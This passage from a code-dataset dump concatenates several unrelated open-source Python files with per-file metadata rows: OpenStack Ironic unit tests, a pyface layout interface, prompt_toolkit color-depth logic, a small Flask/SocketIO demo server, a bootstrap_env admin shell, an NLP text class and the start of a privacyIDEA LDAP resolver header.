def test_reboot_to_instance_boot_error(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock):
check_deploy_mock.return_value = "Error"
uuid_mock.return_value = None
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.boot = None
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
self.assertFalse(prepare_mock.called)
self.assertFalse(power_off_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertEqual(states.DEPLOYFAIL, task.node.provision_state)
self.assertEqual(states.ACTIVE, task.node.target_provision_state)
@mock.patch.object(agent_base_vendor.BaseAgentVendor,
'configure_local_boot', autospec=True)
@mock.patch.object(deploy_utils, 'try_set_boot_device', autospec=True)
@mock.patch.object(agent.AgentVendorInterface, '_get_uuid_from_result',
autospec=True)
@mock.patch.object(manager_utils, 'node_power_action', autospec=True)
@mock.patch.object(fake.FakePower, 'get_power_state',
spec=types.FunctionType)
@mock.patch.object(agent_client.AgentClient, 'power_off',
spec=types.FunctionType)
@mock.patch.object(pxe.PXEBoot, 'prepare_instance',
autospec=True)
@mock.patch('ironic.drivers.modules.agent.AgentVendorInterface'
'.check_deploy_success', autospec=True)
@mock.patch.object(pxe.PXEBoot, 'clean_up_ramdisk', autospec=True)
def test_reboot_to_instance_localboot(self, clean_pxe_mock,
check_deploy_mock,
prepare_mock, power_off_mock,
get_power_state_mock,
node_power_action_mock,
uuid_mock,
bootdev_mock,
configure_mock):
check_deploy_mock.return_value = None
uuid_mock.side_effect = ['root_uuid', 'efi_uuid']
self.node.provision_state = states.DEPLOYWAIT
self.node.target_provision_state = states.ACTIVE
self.node.save()
with task_manager.acquire(self.context, self.node.uuid,
shared=False) as task:
get_power_state_mock.return_value = states.POWER_OFF
task.node.driver_internal_info['is_whole_disk_image'] = False
boot_option = {'capabilities': '{"boot_option": "local"}'}
task.node.instance_info = boot_option
self.passthru.reboot_to_instance(task)
self.assertFalse(clean_pxe_mock.called)
check_deploy_mock.assert_called_once_with(mock.ANY, task.node)
self.assertFalse(bootdev_mock.called)
power_off_mock.assert_called_once_with(task.node)
get_power_state_mock.assert_called_once_with(task)
node_power_action_mock.assert_called_once_with(
task, states.REBOOT)
self.assertEqual(states.ACTIVE, task.node.provision_state)
self.assertEqual(states.NOSTATE, task.node.target_provision_state)
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_did_start(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_multiple_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'},
{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertTrue(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_has_started_other_commands(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'cache_image',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_has_started(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'SUCCESS'}]
self.assertTrue(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_empty_response(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = []
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_race(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'some_other_command',
'command_status': 'SUCCESS'}]
self.assertFalse(self.passthru.deploy_is_done(task))
@mock.patch.object(agent_client.AgentClient, 'get_commands_status',
autospec=True)
def test_deploy_is_done_still_running(self, mock_get_cmd):
with task_manager.acquire(self.context, self.node.uuid) as task:
mock_get_cmd.return_value = [{'command_name': 'prepare_image',
'command_status': 'RUNNING'}]
self.assertFalse(self.passthru.deploy_is_done(task))
class AgentRAIDTestCase(db_base.DbTestCase):
def setUp(self):
super(AgentRAIDTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_agent")
self.passthru = agent.AgentVendorInterface()
self.target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
{'size_gb': 200, 'raid_level': 5}
]}
self.clean_step = {'step': 'create_configuration',
'interface': 'raid'}
n = {
'driver': 'fake_agent',
'instance_info': INSTANCE_INFO,
'driver_info': DRIVER_INFO,
'driver_internal_info': DRIVER_INTERNAL_INFO,
'target_raid_config': self.target_raid_config,
'clean_step': self.clean_step,
}
self.node = object_utils.create_test_node(self.context, **n)
@mock.patch.object(deploy_utils, 'agent_get_clean_steps', autospec=True)
def test_get_clean_steps(self, get_steps_mock):
get_steps_mock.return_value = [
{'step': 'create_configuration', 'interface': 'raid',
'priority': 1},
{'step': 'delete_configuration', 'interface': 'raid',
'priority': 2}]
with task_manager.acquire(self.context, self.node.uuid) as task:
ret = task.driver.raid.get_clean_steps(task)
self.assertEqual(0, ret[0]['priority'])
self.assertEqual(0, ret[1]['priority'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(task)
self.assertEqual(states.CLEANWAIT, return_value)
self.assertEqual(
self.target_raid_config,
task.node.driver_internal_info['target_raid_config'])
execute_mock.assert_called_once_with(task, self.clean_step)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_root(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_root_volume=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 5}
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_skip_nonroot(self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
execute_mock.return_value = states.CLEANWAIT
return_value = task.driver.raid.create_configuration(
task, create_nonroot_volumes=False)
self.assertEqual(states.CLEANWAIT, return_value)
execute_mock.assert_called_once_with(task, self.clean_step)
exp_target_raid_config = {
"logical_disks": [
{'size_gb': 200, 'raid_level': 0, 'is_root_volume': True},
]}
self.assertEqual(
exp_target_raid_config,
task.node.driver_internal_info['target_raid_config'])
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_no_target_raid_config_after_skipping(
self, execute_mock):
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(
exception.MissingParameterValue,
task.driver.raid.create_configuration,
task, create_root_volume=False,
create_nonroot_volumes=False)
self.assertFalse(execute_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_create_configuration_empty_target_raid_config(
self, execute_mock):
execute_mock.return_value = states.CLEANING
self.node.target_raid_config = {}
self.node.save()
with task_manager.acquire(self.context, self.node.uuid) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.raid.create_configuration,
task)
self.assertFalse(execute_mock.called)
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final(
self, update_raid_info_mock):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
raid_mgmt._create_configuration_final(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_registered(
self, update_raid_info_mock):
self.node.clean_step = {'interface': 'raid',
'step': 'create_configuration'}
command = {'command_result': {'clean_result': 'foo'}}
create_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
create_hook(task, command)
update_raid_info_mock.assert_called_once_with(task.node, 'foo')
@mock.patch.object(raid, 'update_raid_info', autospec=True)
def test__create_configuration_final_bad_command_result(
self, update_raid_info_mock):
command = {}
with task_manager.acquire(self.context, self.node.uuid) as task:
raid_mgmt = agent.AgentRAID
self.assertRaises(exception.IronicException,
raid_mgmt._create_configuration_final,
task, command)
self.assertFalse(update_raid_info_mock.called)
@mock.patch.object(deploy_utils, 'agent_execute_clean_step',
autospec=True)
def test_delete_configuration(self, execute_mock):
execute_mock.return_value = states.CLEANING
with task_manager.acquire(self.context, self.node.uuid) as task:
return_value = task.driver.raid.delete_configuration(task)
execute_mock.assert_called_once_with(task, self.clean_step)
self.assertEqual(states.CLEANING, return_value)
def test__delete_configuration_final(self):
command = {'command_result': {'clean_result': 'foo'}}
with task_manager.acquire(self.context, self.node.uuid) as task:
task.node.raid_config = {'foo': 'bar'}
raid_mgmt = agent.AgentRAID
raid_mgmt._delete_configuration_final(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
def test__delete_configuration_final_registered(
self):
self.node.clean_step = {'interface': 'raid',
'step': 'delete_configuration'}
self.node.raid_config = {'foo': 'bar'}
command = {'command_result': {'clean_result': 'foo'}}
delete_hook = agent_base_vendor._get_post_clean_step_hook(self.node)
with task_manager.acquire(self.context, self.node.uuid) as task:
delete_hook(task, command)
self.node.refresh()
self.assertEqual({}, self.node.raid_config)
| apache-2.0 | 5,521,264,999,136,211,000 | 47.468828 | 79 | 0.590176 | false |
geggo/pyface | pyface/workbench/i_workbench_window_layout.py | 3 | 10821 | #------------------------------------------------------------------------------
# Copyright (c) 2005, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in enthought/LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
# Thanks for using Enthought open source!
#
# Author: Enthought, Inc.
# Description: <Enthought pyface package component>
#------------------------------------------------------------------------------
""" The workbench window layout interface. """
# Enthought library imports.
from traits.api import Event, HasTraits, Instance, Interface, Str
from traits.api import provides
# Local imports.
from .i_editor import IEditor
from .i_view import IView
class IWorkbenchWindowLayout(Interface):
""" The workbench window layout interface.
Window layouts are responsible for creating and managing the internal
structure of a workbench window (it knows how to add and remove views and
editors etc).
"""
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
# FIXME v3: The "just for convenience" returns are a really bad idea.
#
# Why? They allow the call to be used on the LHS of an expression...
# Because they have nothing to do with what the call is supposed to be
# doing, they are unlikely to be used (because they are so unexpected and
# inconsistently implemented), and only serve to replace two shorter lines
# of code with one long one, arguably making code more difficult to read.
def activate_editor(self, editor):
""" Activate an editor.
Returns the editor (just for convenience).
"""
def activate_view(self, view):
""" Activate a view.
Returns the view (just for convenience).
"""
def add_editor(self, editor, title):
""" Add an editor.
Returns the editor (just for convenience).
"""
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view.
Returns the view (just for convenience).
"""
def close_editor(self, editor):
""" Close an editor.
Returns the editor (just for convenience).
"""
def close_view(self, view):
""" Close a view.
FIXME v3: Currently views are never 'closed' in the same sense as an
editor is closed. When we close an editor, we destroy its control.
When we close a view, we merely hide its control. I'm not sure if this
is a good idea or not. It came about after discussion with Dave P. and
he mentioned that some views might find it hard to persist enough state
that they can be re-created exactly as they were when they are shown
again.
Returns the view (just for convenience).
"""
def close(self):
""" Close the entire window layout.
FIXME v3: Should this be called 'destroy'?
"""
def create_initial_layout(self, parent):
""" Create the initial window layout.
Returns the layout.
"""
def contains_view(self, view):
""" Return True if the view exists in the window layout.
Note that this returns True even if the view is hidden.
"""
def hide_editor_area(self):
""" Hide the editor area.
"""
def hide_view(self, view):
""" Hide a view.
Returns the view (just for convenience).
"""
def refresh(self):
""" Refresh the window layout to reflect any changes.
"""
def reset_editors(self):
""" Activate the first editor in every group.
"""
def reset_views(self):
""" Activate the first view in every region.
"""
def show_editor_area(self):
""" Show the editor area.
"""
def show_view(self, view):
""" Show a view.
"""
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views.
"""
def set_view_memento(self, memento):
""" Restores the state of the views.
"""
def get_editor_memento(self):
""" Returns the state of the editors.
"""
def set_editor_memento(self, memento):
""" Restores the state of the editors.
"""
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
@provides(IWorkbenchWindowLayout)
class MWorkbenchWindowLayout(HasTraits):
""" Mixin containing common code for toolkit-specific implementations. """
#### 'IWorkbenchWindowLayout' interface ###################################
# The Id of the editor area.
# FIXME v3: This is toolkit specific.
editor_area_id = Str
# The workbench window that this is the layout for.
window = Instance('pyface.workbench.api.WorkbenchWindow')
#### Events ####
# Fired when an editor is about to be opened (or restored).
editor_opening = Event(IEditor)
# Fired when an editor has been opened (or restored).
editor_opened = Event(IEditor)
# Fired when an editor is about to be closed.
editor_closing = Event(IEditor)
# Fired when an editor has been closed.
editor_closed = Event(IEditor)
# Fired when a view is about to be opened (or restored).
view_opening = Event(IView)
# Fired when a view has been opened (or restored).
view_opened = Event(IView)
# Fired when a view is about to be closed (*not* hidden!).
view_closing = Event(IView)
# Fired when a view has been closed (*not* hidden!).
view_closed = Event(IView)
###########################################################################
# 'IWorkbenchWindowLayout' interface.
###########################################################################
def activate_editor(self, editor):
""" Activate an editor. """
raise NotImplementedError
def activate_view(self, view):
""" Activate a view. """
raise NotImplementedError
def add_editor(self, editor, title):
""" Add an editor. """
raise NotImplementedError
def add_view(self, view, position=None, relative_to=None, size=(-1, -1)):
""" Add a view. """
raise NotImplementedError
def close_editor(self, editor):
""" Close an editor. """
raise NotImplementedError
def close_view(self, view):
""" Close a view. """
raise NotImplementedError
def close(self):
""" Close the entire window layout. """
raise NotImplementedError
def create_initial_layout(self, parent):
""" Create the initial window layout. """
raise NotImplementedError
def contains_view(self, view):
""" Return True if the view exists in the window layout. """
raise NotImplementedError
def hide_editor_area(self):
""" Hide the editor area. """
raise NotImplementedError
def hide_view(self, view):
""" Hide a view. """
raise NotImplementedError
def refresh(self):
""" Refresh the window layout to reflect any changes. """
raise NotImplementedError
def reset_editors(self):
""" Activate the first editor in every group. """
raise NotImplementedError
def reset_views(self):
""" Activate the first view in every region. """
raise NotImplementedError
def show_editor_area(self):
""" Show the editor area. """
raise NotImplementedError
def show_view(self, view):
""" Show a view. """
raise NotImplementedError
#### Methods for saving and restoring the layout ##########################
def get_view_memento(self):
""" Returns the state of the views. """
raise NotImplementedError
def set_view_memento(self, memento):
""" Restores the state of the views. """
raise NotImplementedError
def get_editor_memento(self):
""" Returns the state of the editors. """
raise NotImplementedError
def set_editor_memento(self, memento):
""" Restores the state of the editors. """
raise NotImplementedError
def get_toolkit_memento(self):
""" Return any toolkit-specific data that should be part of the memento.
"""
return None
def set_toolkit_memento(self, memento):
""" Restores any toolkit-specific data.
"""
return
###########################################################################
# Protected 'MWorkbenchWindowLayout' interface.
###########################################################################
def _get_editor_references(self):
""" Returns a reference to every editor. """
editor_manager = self.window.editor_manager
editor_references = {}
for editor in self.window.editors:
# Create the editor reference.
#
# If the editor manager returns 'None' instead of a resource
# reference then this editor will not appear the next time the
# workbench starts up. This is useful for things like text files
# that have an editor but have NEVER been saved.
editor_reference = editor_manager.get_editor_memento(editor)
if editor_reference is not None:
editor_references[editor.id] = editor_reference
return editor_references
#### EOF ######################################################################
| bsd-3-clause | -4,267,509,263,042,674,000 | 26.675192 | 80 | 0.590796 | false |
lmregus/Portfolio | python/design_patterns/env/lib/python3.7/site-packages/prompt_toolkit/output/color_depth.py | 1 | 1497 | from __future__ import unicode_literals
from prompt_toolkit.utils import is_windows
import os
__all__ = [
'ColorDepth',
]
class ColorDepth(object):
"""
Possible color depth values for the output.
"""
#: One color only.
DEPTH_1_BIT = 'DEPTH_1_BIT'
#: ANSI Colors.
DEPTH_4_BIT = 'DEPTH_4_BIT'
#: The default.
DEPTH_8_BIT = 'DEPTH_8_BIT'
#: 24 bit True color.
DEPTH_24_BIT = 'DEPTH_24_BIT'
# Aliases.
MONOCHROME = DEPTH_1_BIT
ANSI_COLORS_ONLY = DEPTH_4_BIT
DEFAULT = DEPTH_8_BIT
TRUE_COLOR = DEPTH_24_BIT
_ALL = [DEPTH_1_BIT, DEPTH_4_BIT, DEPTH_8_BIT, DEPTH_24_BIT]
@classmethod
def default(cls, term=''):
"""
If the user doesn't specify a color depth, use this as a default.
"""
if term in ('linux', 'eterm-color'):
return cls.DEPTH_4_BIT
# For now, always use 4 bit color on Windows 10 by default, even when
# vt100 escape sequences with ENABLE_VIRTUAL_TERMINAL_PROCESSING are
# supported. We don't have a reliable way yet to know whether our
# console supports true color or only 4-bit.
if is_windows() and 'PROMPT_TOOLKIT_COLOR_DEPTH' not in os.environ:
return cls.DEPTH_4_BIT
# Check the `PROMPT_TOOLKIT_COLOR_DEPTH` environment variable.
if os.environ.get('PROMPT_TOOLKIT_COLOR_DEPTH') in cls._ALL:
return os.environ['PROMPT_TOOLKIT_COLOR_DEPTH']
return cls.DEPTH_8_BIT
| mit | 2,101,513,724,883,425,300 | 27.245283 | 77 | 0.616566 | false |
WorldViews/Spirals | dummyServer.py | 1 | 2519 |
import json, time
import flask
from flask import Flask, render_template, send_file, \
jsonify, send_from_directory, request
from flask_socketio import SocketIO, emit
rdb = None
try:
import rethinkdb as rdb
#rdb.connect('localhost', 28015).repl()
conn = rdb.connect(db='test')
except:
print "*** Running without DB ***"
rdb = None
app = Flask(__name__, static_url_path='')
app.debug = True
app.config['SECRET_KEY'] = 'secret!'
socketio = SocketIO(app)
@app.route('/')
def index():
return send_file('index.html')
@app.route('/regp/', methods=['POST','GET'])
def reg():
print "reg path:", request.path
print "reg args", request.args
t = time.time()
name = request.args.get('name')
tagStr = request.args.get('tagStr')
clientType = request.args.get('clientType')
lon = float(request.args.get('longitude'))
lat = float(request.args.get('latitude'))
room = request.args.get('room')
numUsers = int(request.args.get('numUsers'))
obj = {'t': t, 'name': name, 'tagStr': tagStr,
'lon': lon, 'lat': lat, 'room': room,
'numUsers': numUsers, 'clientType': clientType}
print obj
return "ok"
@app.route('/Viewer/<path:path>')
def send(path):
print "send_page", path
return send_from_directory('Viewer', path)
@app.route('/Cesium/<path:path>')
def send_page(path):
print "send_page", path
return send_from_directory('Cesium', path)
@app.route('/db/<path:etype>')
def query(etype):
#print "query", etype
t = time.time()
if rdb == None:
return flask.jsonify({'error': 'No DB', 't': t, 'records': []})
recs = rdb.table(etype).run(conn)
items = [x for x in recs]
obj = {'type': etype,
't' : t,
'records': items}
return flask.jsonify(obj)
@socketio.on('my event')
def test_message(message):
emit('my response', {'data': 'got it!'})
@socketio.on('chat')
def handle_chat(msg):
print "handle_chat:", msg
emit('chat', msg, broadcast=True)
addMsg(msg, 'chat')
@socketio.on('notes')
def handle_notes(msg):
print "handle_notes:", msg
emit('notes', msg, broadcast=True)
addMsg(msg, 'notes')
@socketio.on('people')
def handle_people(msg):
#print "handle_people:", msg
emit('people', msg, broadcast=True)
def addMsg(msgStr, etype):
obj = json.loads(msgStr)
rdb.table(etype).insert(obj).run(conn)
if __name__ == '__main__':
#socketio.run(app, port=80)
socketio.run(app, host="0.0.0.0", port=80)
| mit | -4,448,048,485,143,224,300 | 25.239583 | 71 | 0.613339 | false |
jedie/bootstrap_env | bootstrap_env/admin_shell/normal_shell.py | 1 | 7715 |
"""
Admin Shell commands available in 'normal' install mode
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IMPORTANT:
Every import from external packages must be made with LazyImportError!
Otherwise the bootstrap will fail, because no external package is
available in bootstrap process!
:created: 03.2018 by Jens Diemer, www.jensdiemer.de
:copyleft: 2018 by the bootstrap_env team, see AUTHORS for more details.
:license: GNU General Public License v3 or later (GPLv3+), see LICENSE for more details.
"""
import os
import sys
from pathlib import Path
# Bootstrap-Env
from bootstrap_env.boot_bootstrap_env import Cmd2, VerboseSubprocess, __version__, get_pip_file_name, in_virtualenv
from bootstrap_env.utils.import_utils import LazyImportError
from bootstrap_env.version import __version__ as bootstrap_env_version
# External libs:
try:
from cookiecutter.main import cookiecutter
except ImportError as err:
# Re-Raise ImportError on first usage
cookiecutter = LazyImportError(err)
class AdminShell(Cmd2):
"""
Normal user commands.
Only this commands are available in 'normal' installation mode.
"""
version = __version__
def __init__(self, path_helper, *args, **kwargs):
self.path_helper = path_helper # bootstrap_env.admin_shell.path_helper.PathHelper instance
super().__init__(*args, **kwargs)
def get_pip3_path(self):
if not in_virtualenv():
self.stdout.write("\nERROR: Only allowed in activated virtualenv!\n\n")
return
if sys.platform == 'win32':
bin_dir_name="Scripts"
else:
bin_dir_name = "bin"
pip3_path = Path(sys.prefix, bin_dir_name, get_pip_file_name()) # e.g.: .../bin/pip3
if not pip3_path.is_file():
print("ERROR: pip not found here: '%s'" % pip3_path)
return
print("pip found here: '%s'" % pip3_path)
return pip3_path
def do_install_test_requirements(self, arg=None):
"""
Install packages to run tests
"""
pip3_path = self.get_pip3_path()
VerboseSubprocess(
str(pip3_path), "install", "-r", str(self.path_helper.test_req_path)
).verbose_call(check=True) # Exit on error
def do_pytest(self, arg=None):
"""
Run tests via pytest
"""
try:
import pytest
except ImportError as err:
print("ERROR: Can't import pytest: %s (pytest not installed, in normal installation!)" % err)
else:
root_path = str(self.path_helper.base)
print("chdir %r" % root_path)
os.chdir(root_path)
args = sys.argv[2:]
print("Call Pytest with args: %s" % repr(args))
exit_code = pytest.main(args=args)
sys.exit(exit_code)
def do_pip_freeze(self, arg=None):
"""
Just run 'pip freeze'
"""
return_code = VerboseSubprocess("pip3", "freeze").verbose_call(check=False)
def do_update_env(self, arg=None):
"""
Update all packages in virtualenv.
(Call this command only in a activated virtualenv.)
"""
pip3_path = str(self.get_pip3_path())
# Upgrade pip first:
if sys.platform == 'win32':
# Note: On windows it will crash with a PermissionError: [WinError 32]
# because pip can't replace himself while running ;)
# Work-a-round is "python -m pip install --upgrade pip"
# see also: https://github.com/pypa/pip/issues/3804
return_code = VerboseSubprocess(
sys.executable or "python",
"-m", "pip", "install", "--upgrade", "pip",
).verbose_call(check=False)
else:
return_code = VerboseSubprocess(
pip3_path, "install", "--upgrade", "pip"
).verbose_call(check=False)
root_path = self.path_helper.base.parent
# Update the requirements files by...
if self.path_helper.normal_mode:
# ... update 'bootstrap_env' PyPi package
return_code = VerboseSubprocess(
pip3_path, "install", "--upgrade", self.path_helper.egg_name
).verbose_call(check=False)
else:
# ... git pull bootstrap_env sources
return_code = VerboseSubprocess(
"git", "pull", "origin",
cwd=str(root_path)
).verbose_call(check=False)
return_code = VerboseSubprocess(
pip3_path, "install", "--editable", ".",
cwd=str(root_path)
).verbose_call(check=False)
requirement_file_path = str(self.path_helper.req_filepath)
# Update with requirements files:
self.stdout.write("Use: '%s'\n" % requirement_file_path)
return_code = VerboseSubprocess(
pip3_path, "install",
"--exists-action", "b", # action when a path already exists: (b)ackup
"--upgrade",
"--requirement", requirement_file_path,
timeout=120 # extended timeout for slow Travis ;)
).verbose_call(check=False)
self.stdout.write("Please restart %s\n" % self.self_filename)
sys.exit(0)
def do_pip_sync(self, arg=None):
"""
run pip-sync (use with care)
pip-sync will install/upgrade/uninstall everything necessary to match the requirements.txt contents.
Be careful: pip-sync is meant to be used only with a requirements.txt generated by pip-compile!
"""
if self.path_helper.egg_name == "bootstrap_env":
print("ERROR: command not allowed for 'bootstrap_env' !\n")
print(
"bootstrap_env doesn't use pip-compile,"
" because Bootstrap-env should be used as a tool in other projects"
" and the projects himself should pin requirements ;) "
)
return
# Run pip-sync only in developer mode
return_code = VerboseSubprocess(
"pip-sync", str(self.path_helper.req_filepath),
cwd=str(self.path_helper.base.parent)
).verbose_call(check=False)
self.stdout.write("Please restart %s\n" % self.self_filename)
sys.exit(0)
def complete_generate_bootstrap(self, text, line, begidx, endidx):
# print("text: %r" % text)
# print("line: %r" % line)
return self._complete_path(text, line, begidx, endidx)
def confirm(self, txt, confirm_values=("y", "j")):
if input("\n%s" % txt).lower() in confirm_values:
return True
return False
def do_generate_bootstrap(self, arg=None):
"""
Generate new bootstrap file via cookiecutter
direct call, e.g.:
bootstrap_env_admin.py generate_bootstrap ~/new_project
"""
if not arg:
print("INFO: No output path given.")
output_dir = Path(arg).expanduser().resolve()
if output_dir.is_dir():
print("Create bootstrap file in: %s" % output_dir)
print("ERROR: output path already exists!")
return
txt = "Create bootstrap file in: %s ? [Y/N]" % output_dir
if not self.confirm(txt):
print("Abort.")
return
repro_path = Path(self.package_path, "boot_source")
result = cookiecutter(
template=str(repro_path),
output_dir=str(output_dir),
extra_context={
"_version": bootstrap_env_version,
}
)
print("bootstrap file created here: %s" % result)
| gpl-3.0 | 498,514,574,296,900,000 | 33.752252 | 115 | 0.576539 | false |
nschaetti/nsNLP | data/Text.py | 1 | 2476 | # -*- coding: utf-8 -*-
#
# File : corpus/IQLACorpus.py
# Description : .
# Date : 16/08/2017
#
# Copyright Nils Schaetti, University of Neuchâtel <[email protected]>
# Imports
from Sample import Sample
import codecs
# Class to access to a text
class Text(Sample):
"""
Class to access to a text
"""
# Constructor
def __init__(self, text_path, author, text_title):
"""
Constructor
:param text_path:
:param author:
"""
super(Text, self).__init__(text_path, author)
self._text_path = text_path
self._author = author
self._title = text_title
# end __init__
########################################
# Public
########################################
# Get title
def get_title(self):
"""
Get title
:return:
"""
return self._title
# end get_title
# Get text
def get_text(self):
"""
Get text
:return:
"""
return codecs.open(self._text_path, 'r', encoding='utf-8').read()
# end text
# Save text
def save(self, text):
"""
Save text
:param text:
:return:
"""
return codecs.open(self._text_path, 'w', encoding='utf-8').write(text)
# end save
# Get author
def get_author(self):
"""
Get author
:return:
"""
return self._author
# end author
# Get path
def get_path(self):
"""
Get path
:return:
"""
return self._text_path
# end get_path
# Get X
def x(self):
"""
Get X
:return:
"""
return self.get_text()
# end x
# Get Y
def y(self):
"""
Get Y
:return:
"""
return self.get_author().get_name()
# end y
########################################
# Override
########################################
# To string
def __unicode__(self):
"""
To string
:return:
"""
return u"Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# To string
def __str__(self):
"""
To string
:return:
"""
return "Text(title: {}, path:{}, author:{})".format(self._title, self._text_path, self._author.get_name())
# end __unicode__
# end Text
| gpl-3.0 | 8,279,968,937,901,342,000 | 19.121951 | 115 | 0.446869 | false |
jh23453/privacyidea | privacyidea/lib/resolvers/LDAPIdResolver.py | 1 | 41677 | # -*- coding: utf-8 -*-
# Copyright (C) 2014 Cornelius Kölbel
# contact: [email protected]
#
# 2017-01-23 Cornelius Kölbel <[email protected]>
# Add certificate verification
# 2017-01-07 Cornelius Kölbel <[email protected]>
# Use get_info=ldap3.NONE for binds to avoid querying of subschema
# Remove LDAPFILTER and self.reversefilter
# 2016-07-14 Cornelius Kölbel <[email protected]>
# Adding getUserId cache.
# 2016-04-13 Cornelius Kölbel <[email protected]>
# Add object_classes and dn_composition to configuration
# to allow flexible user_add
# 2016-04-10 Martin Wheldon <[email protected]>
# Allow user accounts held in LDAP to be edited, providing
# that the account they are using has permission to edit
# those attributes in the LDAP directory
# 2016-02-22 Salvo Rapisarda
# Allow objectGUID to be a users attribute
# 2016-02-19 Cornelius Kölbel <[email protected]>
# Allow objectGUID to be the uid.
# 2015-10-05 Cornelius Kölbel <[email protected]>
# Remove reverse_map, so that one LDAP field can map
# to several privacyIDEA fields.
# 2015-04-16 Cornelius Kölbel <[email protected]>
# Add redundancy with LDAP3 Server pools. Round Robin Strategy
